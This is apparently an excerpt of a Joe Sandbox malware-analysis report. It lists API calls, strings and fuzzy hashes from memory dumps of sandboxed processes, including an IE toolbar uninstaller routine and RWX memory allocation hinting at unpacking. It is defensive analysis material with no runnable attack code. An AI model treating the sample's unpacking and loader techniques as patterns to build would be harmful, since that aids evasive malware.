PathFileExistsW.SHLWAPI(tbcore3.dll), ref: 00BF1061
PathFileExistsW.SHLWAPI(tbcore3U.dll), ref: 00BF1073
LoadLibraryW.KERNEL32(?), ref: 00BF1085
GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00BF1097
FreeLibrary.KERNEL32(00000000), ref: 00BF10A4
CloseHandle.KERNEL32(00000000), ref: 00BF10AB
CoUninitialize.OLE32 ref: 00BF10B1
LocalFree.KERNEL32(00000000), ref: 00BF10BC

Strings

tbcore3.dll, xrefs: 00BF105C, 00BF1067
MyUnregisterServer, xrefs: 00BF1091
Global\IEToolbarUninstaller, xrefs: 00BF100C
tbcore3U.dll, xrefs: 00BF106E, 00BF1079

Memory Dump Source

Source File: 00000027.00000002.3518598128.0000000000BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000027.00000002.3518580323.0000000000BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000027.00000002.3518617798.0000000000BF8000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000027.00000002.3518636388.0000000000BFA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000027.00000002.3518654616.0000000000BFC000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_bf0000_Nw13Wr.jbxd

Similarity

API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
API String ID: 474438367-4110843154
Opcode ID: 96fe424b1d5f9b54b238b38c61f57ee912ab6663c37e045d0a581b0cb25501ee
Instruction ID: 641ba614191968e575c4faac52e568cd7acdd8801b06e4b6101b326a0be0c081
Opcode Fuzzy Hash: 96fe424b1d5f9b54b238b38c61f57ee912ab6663c37e045d0a581b0cb25501ee
Instruction Fuzzy Hash: 2C11BE32605669EB8721AB78AC48ABF37DCEE547617000DA9F742D3060CF21894DCBB6

Function 0259017F Relevance: 2.8, APIs: 2, Instructions: 267memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 025901DF

Memory Dump Source

Source File: 00000027.00000003.2794274260.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_2590000_Nw13Wr.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction ID: e95b0ab51d0cebfe51e9c7eb7bf4099aa7a04adc72c7477e31f1447687af6372
Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction Fuzzy Hash: DDA13C71A00616EFDF14CFA9C880AADBBF5FF48708B148969E419DB391D730E951CB94

Function 00BB044B Relevance: 2.6, APIs: 2, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00BB048B
VirtualFree.KERNELBASE(?,?,00004000), ref: 00BB04F1

Memory Dump Source

Source File: 00000027.00000003.2800309710.0000000000BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_bb0000_Nw13Wr.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
Instruction ID: 5eb082662427f8d7d46f24fe5916f885e2277dd599ee8327c96ddc159c7e6515
Opcode Fuzzy Hash: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
Instruction Fuzzy Hash: AB21C975A10205ABD720BEA48CC5FFFB7F9EF04314F1045A8FB5AA2381D6B1A9009660

Function 0259044B Relevance: 2.6, APIs: 2, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0259048B
VirtualFree.KERNELBASE(?,?,00004000), ref: 025904F1

Memory Dump Source

Source File: 00000027.00000003.2794274260.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_2590000_Nw13Wr.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
Instruction ID: 892f86a6c111412d3b5001bbb633f4230bc0057c51f0c8f67e6612bf3749ee93
Opcode Fuzzy Hash: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
Instruction Fuzzy Hash: 0721D875A00305ABDF209EA4CC84FAFBBF9BF45314F108C68EB5EE22C1D771A9119664

Function 00BF261B Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 00BF2630

Memory Dump Source

Source File: 00000027.00000002.3518598128.0000000000BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000027.00000002.3518580323.0000000000BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000027.00000002.3518617798.0000000000BF8000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000027.00000002.3518636388.0000000000BFA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000027.00000002.3518654616.0000000000BFC000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_bf0000_Nw13Wr.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 8afc5469ef01a507ec550ed96637712fb8450c610466b1ed395ec6cf2d02660d
Instruction ID: ef5732ba307007b1ca77af786d3474b37c6b59872ecc6359e944773cf4f00ca0
Opcode Fuzzy Hash: 8afc5469ef01a507ec550ed96637712fb8450c610466b1ed395ec6cf2d02660d
Instruction Fuzzy Hash: 51D05E326543486EEB009F71AC08B323BDCD384395F108475B90CC7250EE70C995CA40

Function 00BB017F Relevance: 1.5, APIs: 1, Instructions: 267memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00BB01DF

Memory Dump Source

Source File: 00000027.00000003.2800309710.0000000000BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_bb0000_Nw13Wr.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction ID: 68e7d564af1ae6d93f08974bd95531722182b9b876e0abee9b5deccd290c9ac9
Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction Fuzzy Hash: E1A13770A10606EFDB14DFA9C884ABEB7F5FF48304B1481A9E516EB351D7B0EA51CB90

Non-executed Functions

Function 00BF10CC Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 00BF1346
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BF135B
UnhandledExceptionFilter.KERNEL32(00BF816C), ref: 00BF1366
GetCurrentProcess.KERNEL32(C0000409), ref: 00BF1382
TerminateProcess.KERNEL32(00000000), ref: 00BF1389

Memory Dump Source

Source File: 00000027.00000002.3518598128.0000000000BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000027.00000002.3518580323.0000000000BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000027.00000002.3518617798.0000000000BF8000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000027.00000002.3518636388.0000000000BFA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000027.00000002.3518654616.0000000000BFC000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_bf0000_Nw13Wr.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: a9156b3b035fc61b6739ff50566a3be2822fbe67373ad89079033cb647e8c924
Instruction ID: d0527dc62c50fab83ea1cf8039ee61ecd277a923b61c5032b6826ec0d8e394c4
Opcode Fuzzy Hash: a9156b3b035fc61b6739ff50566a3be2822fbe67373ad89079033cb647e8c924
Instruction Fuzzy Hash: 8C21ADF8901204DFC718DF68ED446783BB4FB08352F50546AEA0C97B60EF786989CB5A

Function 00BB00CD Relevance: 2.6, Strings: 2, Instructions: 62COMMON

Download Yara Rule

Strings

ntdl, xrefs: 00BB0142
l, xrefs: 00BB0149

Memory Dump Source

Source File: 00000027.00000003.2800309710.0000000000BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_bb0000_Nw13Wr.jbxd

Similarity

API ID:
String ID: l$ntdl
API String ID: 0-924918826
Opcode ID: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
Instruction ID: efe2e313af657928d137708c0dd7ac968fdf14c3b0788e1e2c9f493498692029
Opcode Fuzzy Hash: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
Instruction Fuzzy Hash: CA11BEB5700609AFCB05BF18C419A6FBBF6FF88710B618199E00597710FB709A218BD5

Function 025900CD Relevance: 2.6, Strings: 2, Instructions: 62COMMON

Download Yara Rule

Strings

l, xrefs: 02590149
ntdl, xrefs: 02590142

Memory Dump Source

Source File: 00000027.00000003.2794274260.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_2590000_Nw13Wr.jbxd

Similarity

API ID:
String ID: l$ntdl
API String ID: 0-924918826
Opcode ID: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
Instruction ID: 96ab7769891f68305aaddd5889cd9cea723f0648f75001536d2d8fe430781388
Opcode Fuzzy Hash: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
Instruction Fuzzy Hash: 36118EB5B00602AFCB15AF18C408A1FBBF6FF88710B618559E005D7750FB349A21CBD9

Function 00BB0643 Relevance: 2.6, Strings: 2, Instructions: 55COMMON

Download Yara Rule

Strings

ntdl, xrefs: 00BB0684
l, xrefs: 00BB068E

Memory Dump Source

Source File: 00000027.00000003.2800309710.0000000000BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_bb0000_Nw13Wr.jbxd

Similarity

API ID:
String ID: l$ntdl
API String ID: 0-924918826
Opcode ID: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
Instruction ID: 84a6a6b2879feddf3a0c26da2556e7eed62649df38aa30aa516d17614ddfc396
Opcode Fuzzy Hash: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
Instruction Fuzzy Hash: 44016171B10214AFCB14AB99D8459BFFBF9EF98754F044099F905A7361DAB0DE008BA1

Function 02590643 Relevance: 2.6, Strings: 2, Instructions: 55COMMON

Download Yara Rule

Strings

l, xrefs: 0259068E
ntdl, xrefs: 02590684

Memory Dump Source

Source File: 00000027.00000003.2794274260.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_2590000_Nw13Wr.jbxd

Similarity

API ID:
String ID: l$ntdl
API String ID: 0-924918826
Opcode ID: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
Instruction ID: 18c3af2a2cffc42e0159f40c488725a00d610f7a8e10bdd963dd3057671d5ac4
Opcode Fuzzy Hash: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
Instruction Fuzzy Hash: 8C016171B00215AFCF049B99C8459AEFBB9FF88664F044499F904A7360DB74DE008BA5

Function 00BF21E5 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00BF9458,0000000C,00BF2320,00000000,00000000,?,00BF174F,00000003,?,?,?,?,?,?,00BF10F6), ref: 00BF21F7
__crt_waiting_on_module_handle.LIBCMT ref: 00BF2202

Part of subcall function 00BF13E1: Sleep.KERNEL32(000003E8,00000000,?,00BF2148,KERNEL32.DLL,?,00BF2194,?,00BF174F,00000003), ref: 00BF13ED
Part of subcall function 00BF13E1: GetModuleHandleW.KERNEL32(?,?,00BF2148,KERNEL32.DLL,?,00BF2194,?,00BF174F,00000003,?,?,?,?,?,?,00BF10F6), ref: 00BF13F6

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00BF222B
GetProcAddress.KERNEL32(?,DecodePointer), ref: 00BF223B
__lock.LIBCMT ref: 00BF225D
InterlockedIncrement.KERNEL32(00BFA4D8), ref: 00BF226A
__lock.LIBCMT ref: 00BF227E
___addlocaleref.LIBCMT ref: 00BF229C

Strings

KERNEL32.DLL, xrefs: 00BF21F1, 00BF21F6, 00BF2201
DecodePointer, xrefs: 00BF2233
EncodePointer, xrefs: 00BF221F

Memory Dump Source

Source File: 00000027.00000002.3518598128.0000000000BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000027.00000002.3518580323.0000000000BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000027.00000002.3518617798.0000000000BF8000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000027.00000002.3518636388.0000000000BFA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000027.00000002.3518654616.0000000000BFC000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_bf0000_Nw13Wr.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 4ca4196cbbba5b8a5e4d0ef281e6312d9be45d806c6bcbc1326daab76e7fcbcb
Instruction ID: eaa21427666cab4515ce572dc40aab2f52d9c5cce9309e03a2a809adeaf6257a
Opcode Fuzzy Hash: 4ca4196cbbba5b8a5e4d0ef281e6312d9be45d806c6bcbc1326daab76e7fcbcb
Instruction Fuzzy Hash: A811D271940709EED720EF79D845B7ABBE0AF10310F104499E699933A0CF74A948CF25

Function 00BF40A0 Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00BF40AC

Part of subcall function 00BF2345: __getptd_noexit.LIBCMT ref: 00BF2348
Part of subcall function 00BF2345: __amsg_exit.LIBCMT ref: 00BF2355

__amsg_exit.LIBCMT ref: 00BF40CC
__lock.LIBCMT ref: 00BF40DC
InterlockedDecrement.KERNEL32(?), ref: 00BF40F9
InterlockedIncrement.KERNEL32(00DB2C68), ref: 00BF4124

Memory Dump Source

Source File: 00000027.00000002.3518598128.0000000000BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000027.00000002.3518580323.0000000000BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000027.00000002.3518617798.0000000000BF8000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000027.00000002.3518636388.0000000000BFA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000027.00000002.3518654616.0000000000BFC000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_bf0000_Nw13Wr.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 750c02f69e78e92ea668efe6d0dea40e06ee30ed45cdb0f78a1089f8b1b40d80
Instruction ID: b43aa87d259c77cc59c451a8c2c744fb3791e4e435f95ed9e432f520c9171c3a
Opcode Fuzzy Hash: 750c02f69e78e92ea668efe6d0dea40e06ee30ed45cdb0f78a1089f8b1b40d80
Instruction Fuzzy Hash: 3101AD72901629ABCB25AF38980637AB7E0FB10710F048095EB04B7691CF746A9DCF96

Function 00BF35EE Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 00BF360C

Part of subcall function 00BF2AA0: __mtinitlocknum.LIBCMT ref: 00BF2AB6
Part of subcall function 00BF2AA0: __amsg_exit.LIBCMT ref: 00BF2AC2
Part of subcall function 00BF2AA0: EnterCriticalSection.KERNEL32(?,?,?,00BF5600,00000004,00BF9628,0000000C,00BF3746,?,?,00000000,00000000,00000000,?,00BF22F7,00000001), ref: 00BF2ACA

___sbh_find_block.LIBCMT ref: 00BF3617
___sbh_free_block.LIBCMT ref: 00BF3626
HeapFree.KERNEL32(00000000,?,00BF9568,0000000C,00BF2A81,00000000,00BF94C8,0000000C,00BF2ABB,?,?,?,00BF5600,00000004,00BF9628,0000000C), ref: 00BF3656
GetLastError.KERNEL32(?,00BF5600,00000004,00BF9628,0000000C,00BF3746,?,?,00000000,00000000,00000000,?,00BF22F7,00000001,00000214), ref: 00BF3667

Memory Dump Source

Source File: 00000027.00000002.3518598128.0000000000BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000027.00000002.3518580323.0000000000BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000027.00000002.3518617798.0000000000BF8000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000027.00000002.3518636388.0000000000BFA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000027.00000002.3518654616.0000000000BFC000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_bf0000_Nw13Wr.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 02a88d4f59b5cd8707d2e3932ecefcfaaaff28c4fd7f8c824dc59c11de7c44af
Instruction ID: 06009c9f7d4989c14828ad1f8bd841572da7c847d7b228da78928fcfabb4abed
Opcode Fuzzy Hash: 02a88d4f59b5cd8707d2e3932ecefcfaaaff28c4fd7f8c824dc59c11de7c44af
Instruction Fuzzy Hash: AF01287190930DBADF206F719C06B7E7AE4EF11B60F604089F600E7291CE348A88CA69

Function 00BF3E04 Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00BF3E10

Part of subcall function 00BF2345: __getptd_noexit.LIBCMT ref: 00BF2348
Part of subcall function 00BF2345: __amsg_exit.LIBCMT ref: 00BF2355

__getptd.LIBCMT ref: 00BF3E27
__amsg_exit.LIBCMT ref: 00BF3E35
__lock.LIBCMT ref: 00BF3E45

Memory Dump Source

Source File: 00000027.00000002.3518598128.0000000000BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000027.00000002.3518580323.0000000000BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000027.00000002.3518617798.0000000000BF8000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000027.00000002.3518636388.0000000000BFA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000027.00000002.3518654616.0000000000BFC000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_bf0000_Nw13Wr.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: a40ca1d63350c72163a652bd5aa78d35a5bb1a4d92c84a0aa220941b507444cd
Instruction ID: e2397be10a9906b9e04e1bd1f056e541b8072ade233125a2d242a69c6fdfd299
Opcode Fuzzy Hash: a40ca1d63350c72163a652bd5aa78d35a5bb1a4d92c84a0aa220941b507444cd
Instruction Fuzzy Hash: 2AF09A7290030D9BDB61BB78840777D72E0AF58B20F1045D9E785AB2E2CF749A49CF62

Analysis Process: aPkMBkaA.exePID: 4840, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	5.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1047
Total number of Limit Nodes:	29

Executed Functions

Function 00941000 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 73
libraryloadersynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 00941006
CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 00941013
GetLastError.KERNEL32 ref: 0094101F
GetCommandLineW.KERNEL32(?), ref: 00941040
CommandLineToArgvW.SHELL32(00000000), ref: 00941047
PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 00941061
PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 00941073
LoadLibraryW.KERNELBASE(?), ref: 00941085
GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00941097
FreeLibrary.KERNELBASE(00000000), ref: 009410A4
CloseHandle.KERNELBASE(00000000), ref: 009410AB
CoUninitialize.COMBASE ref: 009410B1
LocalFree.KERNEL32(00000000), ref: 009410BC

Strings

tbcore3.dll, xrefs: 0094105C, 00941067
MyUnregisterServer, xrefs: 00941091
Global\IEToolbarUninstaller, xrefs: 0094100C
tbcore3U.dll, xrefs: 0094106E, 00941079

Memory Dump Source

Source File: 00000029.00000002.2814496271.0000000000941000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00940000, based on PE: true

Associated: 00000029.00000002.2814477395.0000000000940000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814516029.0000000000948000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814536959.000000000094A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814604611.000000000094C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_940000_aPkMBkaA.jbxd

Similarity

API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
API String ID: 474438367-4110843154
Opcode ID: 6c9ad720c40b2fdee45b79547ed13a40119652dcc2df1a86ffcde6c0f4f1c1ee
Instruction ID: e581623e8e57ebac1e478c7eadbe5fcc775fb9db07619f9f447f625be9ee047c
Opcode Fuzzy Hash: 6c9ad720c40b2fdee45b79547ed13a40119652dcc2df1a86ffcde6c0f4f1c1ee
Instruction Fuzzy Hash: CC11D33662E365EB8320AF60AC08EAF379CEF577597000526F542D2050DF61CC85E7B2

Function 00941465 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 0094146D

Part of subcall function 0094143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,00941472,?,?,009454EE,000000FF,0000001E,?,009436FC,?,00000001,?,?,00942A2A,00000018), ref: 00941444
Part of subcall function 0094143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00941454

ExitProcess.KERNEL32 ref: 00941476

Memory Dump Source

Source File: 00000029.00000002.2814496271.0000000000941000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00940000, based on PE: true

Associated: 00000029.00000002.2814477395.0000000000940000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814516029.0000000000948000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814536959.000000000094A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814604611.000000000094C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_940000_aPkMBkaA.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 74b4e4e6102f9d962ac04473b6eece1b6910ebe7169ea32283e2cccb1bd0e12b
Instruction ID: 7867032a05c83c7c97860ec417c355986d7a8b37f2f6ee3018212270c896d3e0
Opcode Fuzzy Hash: 74b4e4e6102f9d962ac04473b6eece1b6910ebe7169ea32283e2cccb1bd0e12b
Instruction Fuzzy Hash: 4EB0923101410CBBDB063F12DC0AD8E3F2AFB813A0B608020F80C49071DF72AD92AA90

Function 0094261B Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00942630

Memory Dump Source

Source File: 00000029.00000002.2814496271.0000000000941000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00940000, based on PE: true

Associated: 00000029.00000002.2814477395.0000000000940000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814516029.0000000000948000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814536959.000000000094A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814604611.000000000094C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_940000_aPkMBkaA.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: c2308c75a9a54b40d2dac27e05b73ccdaaf4c809216e988e94e23d831d87a243
Instruction ID: da46f32d3d7b0d8bb9a26e335e428ead9dc1201401e212992ec24772a888f719
Opcode Fuzzy Hash: c2308c75a9a54b40d2dac27e05b73ccdaaf4c809216e988e94e23d831d87a243
Instruction Fuzzy Hash: 72D05E3A5783445EDB105F716C08F663BDCD385399F104436B90CC6160F674C590AE04

Function 00941681 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_doexit.LIBCMT ref: 0094168D

Part of subcall function 00941555: __lock.LIBCMT ref: 00941563
Part of subcall function 00941555: __decode_pointer.LIBCMT ref: 0094159A
Part of subcall function 00941555: __decode_pointer.LIBCMT ref: 009415AF
Part of subcall function 00941555: __decode_pointer.LIBCMT ref: 009415D9
Part of subcall function 00941555: __decode_pointer.LIBCMT ref: 009415EF
Part of subcall function 00941555: __decode_pointer.LIBCMT ref: 009415FC
Part of subcall function 00941555: __initterm.LIBCMT ref: 0094162B
Part of subcall function 00941555: __initterm.LIBCMT ref: 0094163B

Memory Dump Source

Source File: 00000029.00000002.2814496271.0000000000941000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00940000, based on PE: true

Associated: 00000029.00000002.2814477395.0000000000940000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814516029.0000000000948000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814536959.000000000094A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814604611.000000000094C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_940000_aPkMBkaA.jbxd

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: 229ef41ddb4e33bab2f616b0e6cb5c8c2c4733780bbfde824f976c0f5aad4f53
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: C1B0123258030C33DB202586EC03F463F0D87C0BA0F250020FA0C1D1F1AAA3B9A180CA

Non-executed Functions

Function 009410CC Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 00941346
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0094135B
UnhandledExceptionFilter.KERNEL32(0094816C), ref: 00941366
GetCurrentProcess.KERNEL32(C0000409), ref: 00941382
TerminateProcess.KERNEL32(00000000), ref: 00941389

Memory Dump Source

Source File: 00000029.00000002.2814496271.0000000000941000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00940000, based on PE: true

Associated: 00000029.00000002.2814477395.0000000000940000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814516029.0000000000948000.00000002.00000001.01000000.0000000C.sdmpDownload File
